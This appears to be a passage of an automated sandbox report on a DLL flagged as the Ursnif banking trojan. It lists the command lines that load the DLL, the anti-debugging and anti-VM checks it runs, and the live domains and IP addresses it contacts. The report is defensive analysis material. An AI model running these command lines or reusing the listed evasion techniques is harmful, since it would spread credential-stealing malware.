            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\SwFlsh32.dll
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SwFlsh32.dll",#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SwFlsh32.dll,DllRegisterServer
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6328 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6328 CREDAT:17414 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6328 CREDAT:148484 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5320 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5320 CREDAT:17414 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5320 CREDAT:82946 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5320 CREDAT:17418 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:660 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:660 CREDAT:17414 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:660 CREDAT:82946 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:660 CREDAT:148482 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4976 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4976 CREDAT:17422 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4976 CREDAT:17424 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4976 CREDAT:345090 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5636 CREDAT:17410 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SwFlsh32.dll",#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\SwFlsh32.dll
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SwFlsh32.dll,DllRegisterServer
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SwFlsh32.dll",#1
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6328 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6328 CREDAT:17414 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6328 CREDAT:148484 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5320 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5320 CREDAT:17414 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5320 CREDAT:82946 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5320 CREDAT:17418 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:660 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:660 CREDAT:17414 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:660 CREDAT:82946 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:660 CREDAT:148482 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4976 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4976 CREDAT:17422 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4976 CREDAT:17424 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4976 CREDAT:345090 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5636 CREDAT:17410 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5DB6AF8A-73DB-11EC-90E5-ECF4BB2D2496}.datJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DF49CB3B88D34074CE.TMPJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winDLL@46/91@34/7
            Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_034F2AB4 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SwFlsh32.dll",#1
            Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10002233 push ecx; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000C83B push esi; iretd
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000C14C push esi; iretd
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000B95D push ds; iretd
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000C470 push ds; retf
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000C3C4 pushad ; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100021E0 push ecx; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_034F81CB push ecx; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_034F7DE0 push ecx; ret
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_04B97DE0 push ecx; ret
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_04B981CB push ecx; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00FA7DE0 push ecx; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00FA81CB push ecx; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_1_10002233 push ecx; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_1_1000C83B push esi; iretd
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_1_1000C470 push ds; retf
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_1_1000C14C push esi; iretd
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_1_1000B95D push ds; iretd
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_1_1000C3C4 pushad ; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_1_100021E0 push ecx; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_051E81CB push ecx; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_051E7DE0 push ecx; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_032F0BFC push dword ptr [esp+0Ch]; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_032F0BFC push dword ptr [esp+10h]; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_032F0827 push dword ptr [ebp-00000284h]; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_032F0A66 push edx; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_032F0ABA push edx; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_032F08B7 push dword ptr [ebp-00000284h]; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_032F08B7 push dword ptr [ebp-0000028Ch]; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_032F08B7 push edx; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_032F08B7 push dword ptr [esp+10h]; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001BE8 LoadLibraryA,GetProcAddress,
            Source: SwFlsh32.dllStatic PE information: real checksum: 0xd1e4d should be: 0xdc1bc
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\SwFlsh32.dll

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000002.00000003.375865630.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.375941264.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413490977.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377794576.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.375998345.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.375960218.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413537323.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.376010591.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370670581.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370609933.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370654960.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.456592499.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.873845107.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370682268.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377701167.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.525325990.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377849557.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.871575841.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.375719746.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413508620.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377869270.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377814213.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370731881.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413551793.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.375909820.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377887122.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.375980649.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.525785355.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413562057.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377730405.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.522435374.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370523422.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370634510.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370551319.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413469441.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413590499.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413446258.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.872902084.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.874384874.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377774023.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6888, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6916, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6928, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6936, type: MEMORYSTR
            Source: C:\Windows\System32\loaddll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Found evasive API chain (may stop execution after checking system information)Show sources
            Source: C:\Windows\System32\loaddll32.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7012Thread sleep time: -1773297476s >= -30000s
            Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\System32\loaddll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
            Source: rundll32.exe, 00000003.00000002.870070028.0000000000A4F000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.693044334.0000000000A4F000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWU,
            Source: regsvr32.exe, 00000002.00000002.871690172.000000000325B000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWP
            Source: loaddll32.exe, 00000000.00000002.870205496.0000000001472000.00000004.00000020.sdmp, loaddll32.exe, 00000000.00000002.870103614.0000000001454000.00000004.00000020.sdmp, loaddll32.exe, 00000000.00000003.740049295.000000000147F000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000002.871545750.0000000003246000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000002.870070028.0000000000A4F000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.693044334.0000000000A4F000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.869953373.00000000009EA000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000002.872734570.00000000034FE000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: regsvr32.exe, 00000002.00000003.648054115.0000000003260000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
            Source: rundll32.exe, 00000004.00000003.674775256.0000000003522000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.872832088.0000000003522000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000003.692829667.0000000003522000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW@
            Source: loaddll32.exe, 00000000.00000003.695289667.0000000001473000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
            Source: regsvr32.exe, 00000002.00000002.871545750.0000000003246000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWB
            Source: rundll32.exe, 00000004.00000003.647362296.0000000003522000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

            Anti Debugging:

            barindex
            Found API chain indicative of debugger detectionShow sources
            Source: C:\Windows\System32\loaddll32.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001BE8 LoadLibraryA,GetProcAddress,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_032F0B14 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_032F0BFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_032F0C57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_032F08B7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_032F0CE8 mov eax, dword ptr fs:[00000030h]

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 31.41.45.66 80
            Source: C:\Windows\SysWOW64\rundll32.exeDomain query: mmmmmm.bar
            Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.mmmmmm.casa
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 162.255.119.219 80
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 198.54.117.212 80
            Source: C:\Windows\SysWOW64\rundll32.exeDomain query: mmmmmm.casa
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 198.54.117.216 80
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SwFlsh32.dll",#1
            Source: loaddll32.exe, 00000000.00000002.870508088.0000000001A80000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.872251398.0000000003780000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.872955046.00000000031D0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.873084104.0000000003930000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: loaddll32.exe, 00000000.00000002.870508088.0000000001A80000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.872251398.0000000003780000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.872955046.00000000031D0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.873084104.0000000003930000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: loaddll32.exe, 00000000.00000002.870508088.0000000001A80000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.872251398.0000000003780000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.872955046.00000000031D0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.873084104.0000000003930000.00000002.00020000.sdmpBinary or memory string: &Program Manager
            Source: loaddll32.exe, 00000000.00000002.870508088.0000000001A80000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.872251398.0000000003780000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.872955046.00000000031D0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.873084104.0000000003930000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_034F21BC cpuid
            Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001DCF GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000169C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_034F21BC RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000002.00000003.375865630.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.375941264.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413490977.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377794576.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.375998345.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.375960218.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413537323.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.376010591.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370670581.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370609933.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370654960.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.456592499.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
